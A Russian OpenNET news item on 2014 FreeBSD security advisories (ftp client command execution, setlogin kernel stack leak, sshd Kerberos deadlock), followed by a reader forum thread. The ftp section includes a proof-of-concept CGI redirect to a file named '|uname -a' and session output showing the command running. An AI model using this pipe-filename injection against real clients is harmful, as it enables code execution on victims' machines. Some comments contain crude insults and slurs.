The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Во FreeBSD устранены уязвимости в ftp, setlogin и sshd

05.11.2014 10:10

Разработчики FreeBSD опубликовали серию уведомлений об устранении уязвимостей:

  • "CVE-2014-8517" - опасная уязвимость в клиенте ftp, которая может привести к выполнению кода при доступе к подконтрольному злоумышленнику серверу с использованием неинтерактивного режима работы утилиты ftp. При запросе с использованием URL утилита ftp поддерживает загрузку данных не только по FTP, но и по протоколу HTTP, в том числе обрабатывает операции перенаправления на другой URL. В случае если явно через опцию "-o" не указан путь к файлу для сохранения данных, осуществляется использование части пути из URL в качестве имени файла. Атакующий может организовать редирект на специально оформленный файл, который приведёт к выполнению заданной команды (например, на сервере можно создать файл с именем "|uname -a" и в ответ на запрос вернуть редирект на него "Location: http://site/|uname%20-a'"). Проблема проявляется во всех поддерживаемых выпусках FreeBSD. Аналогичная проблема устранена в ftp-клиенте NetBSD и возможно присутствует в других BSD-системах.

    Техника атаки: 

    
     a20$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
     a20$

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying 127.0.0.1:80 ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
     Requesting http://192.168.2.19/cgi-bin/|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
     ADT 2014
     Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
     BOARD evbarm
     a20$
  • "CVE-2014-8476" - утечка содержимого стека ядра FreeBSD через манипуляцию с системными вызовами setlogin(2) и getlogin(2). Проблема вызвана тем, что для логина в setlogin выделяется неочищенный буфер фиксированного размера, а getlogin возвращает полное содержимое этого буфера, а не только часть в которой содержится логин (т.е. можно прочитать хвост буфера за нулевым символом, в котором теоретически могут находиться до 16-32 байт с остатками важных данных).
  • "CVE-2014-8475" - проблема сборки sshd c поддержкой Kerberos 5 может привести к инициированию отказа в обслуживании (при обработке входящих запросов можно вызвать взаимную блокировку, которая некоторые время не позволит принимать новые соединения). Проблема проявляется только в ветках FreeBSD 9.x и 10.x.

Дополнительно сообщается об устранении не связанной с безопасностью ошибки, которая может привести к нарушению целостности кэша при доступе к ZFS-разделу поверх NFSv4.

  1. Главная ссылка к новости (https://lists.freebsd.org/pipe...)
  2. OpenNews: Уязвимость в TCP-стеке FreeBSD, позволяющая обрывать чужие TCP-соединения
  3. OpenNews: Выбран новый состав FreeBSD Core Team. Уязвимость в kmem
  4. OpenNews: Во FreeBSD устранены уязвимости в ktrace, PAM, sendmail и exec
  5. OpenNews: В TCP-стеке FreeBSD выявлена опасная уязвимость
  6. OpenNews: В обновлениях к FreeBSD 8 и 9 изменено поведение генератора псевдослучайных чисел и исправлены уязвимости
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/41004-freebsd
Ключевые слова: freebsd
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (50) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 11:33, 05/11/2014 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Ждём мнения экспертов в комментариях.
     
     
  • 2.2, Аноним (-), 11:46, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    Спасибо за доверие! Но тут нет однозначного мнения.
     
     
  • 3.16, Аноним (-), 17:12, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    Не - не так же! Надо так:

    Я - дочь эксперта, тут не всё так однозначно ... :)

     
  • 3.25, Аноним (-), 05:12, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > Спасибо за доверие! Но тут нет однозначного мнения.

    В рядах шкoльников, еще вчера рассказывавших про Качественный Код (R) (C) (tm) случилось замешательство? Код оказался не таким уж и качественным? Бывают в жизни огорчения.

     
  • 2.4, fidaj (ok), 12:38, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    на https://www.linux.org.ru/news/security/10995438 , экспертируй ;)
     
     
  • 3.26, Аноним (-), 05:19, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > на https://www.linux.org.ru/news/security/10995438 , экспертируй ;)

    На лоре вообще какие-то ламаки остались. Ну ок, кучка отказов в обслуживании. При том половина из них делает хуже только самому атакующему, вызвав отказ его же виртуалки. Непорядок, конечно, но если некто ушатал свою же виртуалку - ему же хуже первым делом и будет.

     
  • 2.17, Аноним (-), 17:15, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    > Ждём мнения экспертов в комментариях.

    Первая уязвимость, с ftp - это просто перепев Рабиновича с wget :-\

     
  • 2.19, Журналовращатель (?), 17:32, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Как эксперт, полагаю, что ковырять бояздэ из цигвина, сидя на вантузе - очень модно и молодёжно.
     
  • 2.20, Бывший школьник (?), 17:47, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Эксперты утверждают, что FreeBSD - дырявое помойное ведро.
     
     
  • 3.24, Школьник (ok), 23:29, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Уроки логики у МарьИванны не надо было прогуливать, а то бы знал, что бездоказательные утверждения яйца выеденного не стоят.
     
     
  • 4.27, Аноним (-), 05:23, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    > что бездоказательные утверждения яйца выеденного не стоят.

    А чего там доказывать? Достаточно посмотреть на то как попсовые убунты и даже слоупочные дебианы hardening процессов и ядра раньше сделали. В дебианобразных даже милый такой скриптец есть - запускаешь hardening-check <свежесобранный бинарь> и узнаешь насколько ты (не) лох...

     
     
  • 5.37, Аноним (-), 17:22, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    User294, ты что ли, сукин ты сын?
     

  • 1.3, iZEN (ok), 12:17, 05/11/2014 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > можно прочитать хвост буфера за нулевым символом, в котором теоретически могут находиться до 16-32 байт с остатками важных данных

    Алгоритм Шлемиля в действии! Вспоминается фильм "13 этаж", где после окончания дороги, которую провёл Шлемиль, начинается нечто...

     
     
  • 2.5, Аноним (-), 12:42, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    Нихера какие у тебя содомические ассоциации возникают от простого незнания адресной арифметики. На жабе поди "пишешь"?
     
     
  • 3.10, Аноним (-), 15:04, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Да не говори, мне вот IZen здесь напомнил пещерного человека, который впервые увидел молнию.
     
  • 3.18, www2 (ok), 17:17, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Вполне себе ассоциации. Представьте, что мы живём внутри виртуальной машины, которая осуществляет полную эмуляцию этого мира. В этой виртуальной машине вполне может существовать ошибка, которая в естественных условиях никак не проявляет себя. Но любопытные учёные могут создать условия, в которых эта ошибка проявляется. Далее через уязвимость в реализации виртуальной машины можно получить доступ к ресурсам, изначально недоступным изнутри. И вообще - выйти на более высокий уровень реальности.
     
     
  • 4.21, Имя (?), 18:30, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Вполне себе ассоциации. Представьте, что мы живём внутри виртуальной машины, которая осуществляет
    > полную эмуляцию этого мира. В этой виртуальной машине вполне может существовать
    > ошибка, которая в естественных условиях никак не проявляет себя. Но любопытные
    > учёные могут создать условия, в которых эта ошибка проявляется. Далее через
    > уязвимость в реализации виртуальной машины можно получить доступ к ресурсам, изначально
    > недоступным изнутри. И вообще - выйти на более высокий уровень реальности.

    Курить меньше надо.

     
     
  • 5.22, chinarulezzz (ok), 18:54, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    скучный ты.
     
  • 4.28, Аноним (-), 05:26, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    > недоступным изнутри. И вообще - выйти на более высокий уровень реальности.

    Скорее получить по черепушке от обработчика исключений.


     

  • 1.6, Аноним (-), 12:54, 05/11/2014 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Таки обратите внимание на
    Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
     
     
  • 2.7, qqq (??), 13:03, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    > Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE

    Проверяют как работает кросс-компиляция NetBSD для ARM под Cygwin? Видимо работает.

     
     
  • 3.8, Аноним (-), 13:25, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Офигеть! Думается мне, что эта проверка слишком затяжная.
    Есть вопрос, а почему не из под NetBSD?
     
     
  • 4.9, Аноним (-), 14:55, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Потому что netbsd неудобна на рабочей станции, очевидно. Вопрос в другом: почему из-под винды то?
     
     
  • 5.32, Аноним (-), 05:34, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > из-под винды то?

    Потому что не зря говорят что бсдшники - латентные проприетарщики. Вон изя с маздайкой. Хотя можно примеры и позабористее, типа кибаба с пид...ской операционкой.

     
     
  • 6.42, Клыкастый (ok), 17:01, 07/11/2014 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Говорят с п..кой операционкой "линуксоедов" поболе будет. Некоторые так вообще внезапно "прозревают".
     
     
  • 7.44, Аноним (-), 05:06, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    > Говорят с п..кой операционкой "линуксоедов" поболе будет. Некоторые так вообще внезапно
    > "прозревают".

    Так какие же они тогда линуксоиды? Они пи...сы, а вовсе не... :)

     
     
  • 8.52, Волкот (?), 15:39, 09/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    О том и речь Линуксоиды До каминг аута ... текст свёрнут, показать
     
  • 4.11, Аноним (-), 15:06, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > Есть вопрос, а почему не из под NetBSD?

    Да потому что Jared - не разработчик и не пользователь NetBSD как десктопной системы. Это-же очевидно! зачем ему такие сложности? Можно подумать что все разработчики линукс-бейзд коробочек за 50$ сидят под линуксом. Ага, ждите. У всех - семерочка.

     
     
  • 5.13, А (??), 15:41, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    >Ага, ждите. У всех - семерочка.

    Зачем им такие сложности?

     
     
  • 6.14, Аноним (-), 16:33, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    >>Ага, ждите. У всех - семерочка.
    > Зачем им такие сложности?

    Камрад, рекомендую вернуться к реальной жизни. Большинство из разработчиков эмбедовки не гики и им пофигу под чем сидеть, но поскольку семерку пихают везде и она является default OS на 90% десктопов, то и разрабатывают эмбедовку из под нее. Это же очевидно.

     
     
  • 7.15, 42223 (?), 17:10, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Любое большинство сидит под форточками. За исключением некоторых ниш, это очевидно. Не менее очевидно, что это не удобно и инструментарий там убогий. Поэтому вопрос зачем?
     
  • 7.33, Аноним (-), 05:40, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Ну а кто они Этим невозможно заниматься, не любя свое дело до мозга костей ... большой текст свёрнут, показать
     
     
  • 8.43, iZEN (ok), 18:38, 07/11/2014 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    А во FreeBSD Почему во FreeBSD не получается Исходники же открыты Я не понима... текст свёрнут, показать
     
     
  • 9.45, Аноним (-), 06:15, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    А там IIRC, как обычно в бздах - долбанулись и подорвались переписывать либу ... большой текст свёрнут, показать
     
     
  • 10.46, iZEN (ok), 13:52, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    man libusb DESCRIPTION The libusb library contains interfaces for ... большой текст свёрнут, показать
     
     
  • 11.47, iZEN (ok), 15:21, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    cd usr src tools tools nanobsd sh nanobsd sh 00 00 00 NanoBSD image full ... большой текст свёрнут, показать
     
  • 11.49, Журналовращатель (?), 21:45, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    - UFS2 прежде всего плоха тем, что разваливается на каждый чих, sync может не пр... текст свёрнут, показать
     
     
  • 12.50, iZEN (ok), 22:36, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Ты ничего не путаешь Линус Торвальдс выступил с критикой дизайна файловых систе... текст свёрнут, показать
     
     
  • 13.53, Журналовращатель (?), 19:25, 09/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Тененбаум тоже многое критиковал, написал кучу книг и усрел физически, выйдя на ... текст свёрнут, показать
     
  • 5.31, Аноним (-), 05:32, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > все разработчики линукс-бейзд коробочек за 50$ сидят под линуксом. Ага, ждите.
    > У всех - семерочка.

    Так, глядя на куби прицепленный к компу с линухом: а зачем мне семерочка? Дебиан или убунту респинить на такую платку удобнее из такого же дебианобразного. И как десктоп оно покрывает все мои нужды. А использовать цыгвин можно только из чувства мазохизма. Или если объект фапа еще более гуняв чем это.

     
  • 2.29, Аноним (-), 05:28, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE

    Таки да, любитель putty.exe теперь не отмажется.

     

  • 1.12, Ivan_83 (?), 15:09, 05/11/2014 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Раньше веселее было: с помощью ARP можно было читать по 480+ байт стёка ядра по сети.
    Притом никакого SA не было, по тихому закрыли в начале до 240+символов чтение а потом и совсем :)
     
     
  • 2.23, iZEN (ok), 22:43, 05/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > стёка

    WTF?

     
     
  • 3.34, Аноним (-), 06:59, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Изен узнал новое слово. LOL, just lol.
     
     
  • 4.35, iZEN (ok), 16:13, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Wiki:
    ///---
    Стек (англ. stack — стопка; читается стэк) — структура данных, представляющая собой список элементов, организованных по принципу LIFO (англ. last in — first out, «последним пришёл — первым вышел»).
    ---///

    Что такое "стёк"?

     
     
     
    Часть нити удалена модератором

  • 6.38, Аноним (-), 05:36, 07/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    Казалось бы, при чем тут изен Он вообще типичный бcднн С максималочкой под под... большой текст свёрнут, показать
     
  • 2.30, Аноним (-), 05:29, 06/11/2014 [^] [^^] [^^^] [ответить]  
    		• +/
    > Раньше веселее было: с помощью ARP можно было читать по 480+ байт
    > стёка ядра по сети.

    Ну подумаешь, полкило туда, полкило сюда...

     
     
  • 3.48, Аноним (-), 20:59, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    А пруф то будет? А то лужа и так бурлит :)
     
     
  • 4.51, Аноним (-), 22:47, 08/11/2014 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    изен/брин - залогиньтесь обратно )
     

  • 1.54, Аноним (-), 16:17, 14/11/2014 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    По первой проблеме кто вообще додумался использовать popen outfilename, w дл... большой текст свёрнут, показать
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру